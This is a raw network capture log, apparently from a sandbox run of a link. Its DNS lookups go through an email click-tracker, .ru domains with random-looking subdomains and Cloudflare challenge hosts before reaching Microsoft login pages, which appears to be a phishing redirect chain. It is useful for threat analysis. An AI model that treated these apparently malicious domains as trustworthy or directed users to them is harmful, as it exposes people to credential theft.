                                                            Jan 6, 2025 16:54:28.088258028 CET49868443192.168.2.4142.250.185.196
                                                            Jan 6, 2025 16:54:28.088318110 CET44349868142.250.185.196192.168.2.4
                                                            Jan 6, 2025 16:54:28.141309977 CET49868443192.168.2.4142.250.185.196
                                                            Jan 6, 2025 16:54:29.631449938 CET44349741167.89.118.23192.168.2.4
                                                            Jan 6, 2025 16:54:29.631515026 CET44349741167.89.118.23192.168.2.4
                                                            Jan 6, 2025 16:54:29.631577969 CET49741443192.168.2.4167.89.118.23
                                                            Jan 6, 2025 16:54:29.846556902 CET49741443192.168.2.4167.89.118.23
                                                            Jan 6, 2025 16:54:29.846570015 CET44349741167.89.118.23192.168.2.4
                                                            Jan 6, 2025 16:54:32.126982927 CET4972380192.168.2.4199.232.210.172
                                                            Jan 6, 2025 16:54:32.127094984 CET4972480192.168.2.4199.232.210.172
                                                            Jan 6, 2025 16:54:32.132081032 CET8049723199.232.210.172192.168.2.4
                                                            Jan 6, 2025 16:54:32.132150888 CET4972380192.168.2.4199.232.210.172
                                                            Jan 6, 2025 16:54:32.132354021 CET8049724199.232.210.172192.168.2.4
                                                            Jan 6, 2025 16:54:32.132440090 CET4972480192.168.2.4199.232.210.172
                                                            Jan 6, 2025 16:54:38.004215002 CET44349868142.250.185.196192.168.2.4
                                                            Jan 6, 2025 16:54:38.004270077 CET44349868142.250.185.196192.168.2.4
                                                            Jan 6, 2025 16:54:38.004323959 CET49868443192.168.2.4142.250.185.196
                                                            Jan 6, 2025 16:54:39.845585108 CET49868443192.168.2.4142.250.185.196
                                                            Jan 6, 2025 16:54:39.845602989 CET44349868142.250.185.196192.168.2.4
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 6, 2025 16:53:23.444197893 CET53510981.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:23.504678965 CET53503791.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:24.758738041 CET53612601.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:27.344693899 CET5651453192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:27.344830990 CET6109953192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:27.351288080 CET53565141.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:27.351458073 CET53610991.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:28.763560057 CET6394853192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:28.763798952 CET5010953192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:28.979800940 CET53501091.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:28.980313063 CET53639481.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:30.065854073 CET5757853192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:30.066018105 CET5401053192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:30.283603907 CET53540101.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:30.393652916 CET53575781.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:31.867754936 CET53598281.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:41.774578094 CET53655261.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:43.714926004 CET138138192.168.2.4192.168.2.255
                                                            Jan 6, 2025 16:53:45.459861040 CET5300953192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:45.460050106 CET6140153192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:45.469841957 CET53614011.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:45.656045914 CET53530091.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:47.262193918 CET5894653192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:47.262316942 CET5901153192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:47.262788057 CET5049553192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:47.262934923 CET5328953192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:47.263274908 CET5808353192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:47.263401985 CET5510653192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:47.268733978 CET53589461.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:47.269710064 CET53504951.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:47.269897938 CET53580831.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:47.269937992 CET53551061.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:47.270272970 CET53590111.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:47.270775080 CET53532891.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:47.990593910 CET6492753192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:47.990880013 CET5804353192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:47.997476101 CET53649271.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:47.997581959 CET53580431.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:48.040146112 CET6088953192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:48.040343046 CET5915853192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:48.047139883 CET53591581.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:48.047151089 CET53608891.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:48.586551905 CET5851453192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:48.586754084 CET5624353192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:48.593560934 CET53585141.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:48.594531059 CET53562431.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:48.617346048 CET5063853192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:48.617507935 CET6319453192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:48.624219894 CET53506381.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:48.624454021 CET53631941.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:50.504575968 CET6272653192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:50.504718065 CET5577253192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:53:50.511496067 CET53557721.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:53:50.511544943 CET53627261.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:00.777786016 CET53575931.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:04.030869007 CET5691153192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:04.031039000 CET5037253192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:04.083432913 CET53569111.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:04.223263025 CET53503721.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:05.205497980 CET5827653192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:05.205693960 CET5661253192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:05.232999086 CET5789953192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:05.233156919 CET6329953192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:05.293709993 CET53578991.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:05.425930023 CET53632991.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:06.315350056 CET5498753192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:06.315488100 CET5968853192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:06.348583937 CET53596881.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:08.685637951 CET5439153192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:08.685997963 CET6355353192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:08.693432093 CET53635531.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:09.788256884 CET5679553192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:09.788256884 CET6400953192.168.2.41.1.1.1
                                                            Jan 6, 2025 16:54:09.794775963 CET53567951.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:09.795866966 CET53640091.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:14.999974012 CET53634731.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:23.096179008 CET53505071.1.1.1192.168.2.4
                                                            Jan 6, 2025 16:54:23.305952072 CET53629381.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Jan 6, 2025 16:54:04.223366976 CET192.168.2.41.1.1.1c30c(Port unreachable)Destination Unreachable
                                                            Jan 6, 2025 16:54:05.426018953 CET192.168.2.41.1.1.1c30c(Port unreachable)Destination Unreachable
                                                            Jan 6, 2025 16:54:06.348644972 CET192.168.2.41.1.1.1c26b(Port unreachable)Destination Unreachable
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 6, 2025 16:53:27.344693899 CET192.168.2.41.1.1.10xc2dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:27.344830990 CET192.168.2.41.1.1.10x51c6Standard query (0)www.google.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.763560057 CET192.168.2.41.1.1.10xf93Standard query (0)u1427642.ct.sendgrid.netA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.763798952 CET192.168.2.41.1.1.10x2441Standard query (0)u1427642.ct.sendgrid.net65IN (0x0001)false
                                                            Jan 6, 2025 16:53:30.065854073 CET192.168.2.41.1.1.10x1c51Standard query (0)xre.wzr.mybluehostin.meA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:30.066018105 CET192.168.2.41.1.1.10x54a0Standard query (0)xre.wzr.mybluehostin.me65IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.459861040 CET192.168.2.41.1.1.10xa609Standard query (0)gimd.lamantatio.ruA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.460050106 CET192.168.2.41.1.1.10x51d5Standard query (0)gimd.lamantatio.ru65IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.262193918 CET192.168.2.41.1.1.10xdfbdStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.262316942 CET192.168.2.41.1.1.10x3678Standard query (0)code.jquery.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.262788057 CET192.168.2.41.1.1.10x436aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.262934923 CET192.168.2.41.1.1.10xcf9bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.263274908 CET192.168.2.41.1.1.10x21f4Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.263401985 CET192.168.2.41.1.1.10x9c0cStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.990593910 CET192.168.2.41.1.1.10x28f4Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.990880013 CET192.168.2.41.1.1.10xf417Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.040146112 CET192.168.2.41.1.1.10x8427Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.040343046 CET192.168.2.41.1.1.10xa353Standard query (0)code.jquery.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.586551905 CET192.168.2.41.1.1.10xed32Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.586754084 CET192.168.2.41.1.1.10x99c3Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.617346048 CET192.168.2.41.1.1.10x9fe2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.617507935 CET192.168.2.41.1.1.10x461eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:50.504575968 CET192.168.2.41.1.1.10xeba0Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:50.504718065 CET192.168.2.41.1.1.10x2aeeStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.030869007 CET192.168.2.41.1.1.10xcbe2Standard query (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ruA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.031039000 CET192.168.2.41.1.1.10xaa9aStandard query (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru65IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.205497980 CET192.168.2.41.1.1.10x1b89Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.205693960 CET192.168.2.41.1.1.10x5a6bStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.232999086 CET192.168.2.41.1.1.10x7084Standard query (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ruA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.233156919 CET192.168.2.41.1.1.10xc299Standard query (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru65IN (0x0001)false
                                                            Jan 6, 2025 16:54:06.315350056 CET192.168.2.41.1.1.10xd5a6Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:06.315488100 CET192.168.2.41.1.1.10x606Standard query (0)www.office.com65IN (0x0001)false
                                                            Jan 6, 2025 16:54:08.685637951 CET192.168.2.41.1.1.10x3510Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:08.685997963 CET192.168.2.41.1.1.10x6980Standard query (0)www.office.com65IN (0x0001)false
                                                            Jan 6, 2025 16:54:09.788256884 CET192.168.2.41.1.1.10x785fStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:09.788256884 CET192.168.2.41.1.1.10xd71eStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 6, 2025 16:53:27.351288080 CET1.1.1.1192.168.2.40xc2dNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:27.351458073 CET1.1.1.1192.168.2.40x51c6No error (0)www.google.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.118.23A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.115.65A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.118.74A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.115.147A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.115.26A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.118.28A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.118.31A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.118.118A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.115.64A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.115.54A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.115.58A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.118.126A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.115.35A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.115.121A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.118.106A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:28.980313063 CET1.1.1.1192.168.2.40xf93No error (0)u1427642.ct.sendgrid.net167.89.118.35A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:30.393652916 CET1.1.1.1192.168.2.40x1c51No error (0)xre.wzr.mybluehostin.me162.214.80.73A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.469841957 CET1.1.1.1192.168.2.40x51d5No error (0)gimd.lamantatio.ru65IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.656045914 CET1.1.1.1192.168.2.40xa609No error (0)gimd.lamantatio.ru104.21.32.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.656045914 CET1.1.1.1192.168.2.40xa609No error (0)gimd.lamantatio.ru104.21.96.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.656045914 CET1.1.1.1192.168.2.40xa609No error (0)gimd.lamantatio.ru104.21.48.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.656045914 CET1.1.1.1192.168.2.40xa609No error (0)gimd.lamantatio.ru104.21.112.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.656045914 CET1.1.1.1192.168.2.40xa609No error (0)gimd.lamantatio.ru104.21.80.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.656045914 CET1.1.1.1192.168.2.40xa609No error (0)gimd.lamantatio.ru104.21.64.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:45.656045914 CET1.1.1.1192.168.2.40xa609No error (0)gimd.lamantatio.ru104.21.16.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.268733978 CET1.1.1.1192.168.2.40xdfbdNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.268733978 CET1.1.1.1192.168.2.40xdfbdNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.268733978 CET1.1.1.1192.168.2.40xdfbdNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.268733978 CET1.1.1.1192.168.2.40xdfbdNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.269710064 CET1.1.1.1192.168.2.40x436aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.269710064 CET1.1.1.1192.168.2.40x436aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.269897938 CET1.1.1.1192.168.2.40x21f4No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.269897938 CET1.1.1.1192.168.2.40x21f4No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.269937992 CET1.1.1.1192.168.2.40x9c0cNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.270775080 CET1.1.1.1192.168.2.40xcf9bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.997476101 CET1.1.1.1192.168.2.40x28f4No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.997476101 CET1.1.1.1192.168.2.40x28f4No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:47.997581959 CET1.1.1.1192.168.2.40xf417No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.047151089 CET1.1.1.1192.168.2.40x8427No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.047151089 CET1.1.1.1192.168.2.40x8427No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.047151089 CET1.1.1.1192.168.2.40x8427No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.047151089 CET1.1.1.1192.168.2.40x8427No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.593560934 CET1.1.1.1192.168.2.40xed32No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.593560934 CET1.1.1.1192.168.2.40xed32No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.594531059 CET1.1.1.1192.168.2.40x99c3No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.624219894 CET1.1.1.1192.168.2.40x9fe2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.624219894 CET1.1.1.1192.168.2.40x9fe2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:53:48.624454021 CET1.1.1.1192.168.2.40x461eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 6, 2025 16:53:50.511544943 CET1.1.1.1192.168.2.40xeba0No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.083432913 CET1.1.1.1192.168.2.40xcbe2No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.083432913 CET1.1.1.1192.168.2.40xcbe2No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.083432913 CET1.1.1.1192.168.2.40xcbe2No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.083432913 CET1.1.1.1192.168.2.40xcbe2No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.083432913 CET1.1.1.1192.168.2.40xcbe2No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.083432913 CET1.1.1.1192.168.2.40xcbe2No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.083432913 CET1.1.1.1192.168.2.40xcbe2No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:04.223263025 CET1.1.1.1192.168.2.40xaa9aNo error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru65IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.212292910 CET1.1.1.1192.168.2.40x5a6bNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.212302923 CET1.1.1.1192.168.2.40x1b89No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.293709993 CET1.1.1.1192.168.2.40x7084No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.293709993 CET1.1.1.1192.168.2.40x7084No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.293709993 CET1.1.1.1192.168.2.40x7084No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.293709993 CET1.1.1.1192.168.2.40x7084No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.293709993 CET1.1.1.1192.168.2.40x7084No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.293709993 CET1.1.1.1192.168.2.40x7084No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.293709993 CET1.1.1.1192.168.2.40x7084No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:05.425930023 CET1.1.1.1192.168.2.40xc299No error (0)xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru65IN (0x0001)false
                                                            Jan 6, 2025 16:54:06.322611094 CET1.1.1.1192.168.2.40xd5a6No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:06.322611094 CET1.1.1.1192.168.2.40xd5a6No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:06.348583937 CET1.1.1.1192.168.2.40x606No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:06.348583937 CET1.1.1.1192.168.2.40x606No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:07.612473965 CET1.1.1.1192.168.2.40x6e8dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:07.612473965 CET1.1.1.1192.168.2.40x6e8dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:08.645993948 CET1.1.1.1192.168.2.40x42e3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:08.645993948 CET1.1.1.1192.168.2.40x42e3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                            Jan 6, 2025 16:54:08.693183899 CET1.1.1.1192.168.2.40x3510No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:08.693183899 CET1.1.1.1192.168.2.40x3510No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:08.693432093 CET1.1.1.1192.168.2.40x6980No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:08.693432093 CET1.1.1.1192.168.2.40x6980No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:09.794775963 CET1.1.1.1192.168.2.40x785fNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 6, 2025 16:54:09.794775963 CET1.1.1.1192.168.2.40x785fNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
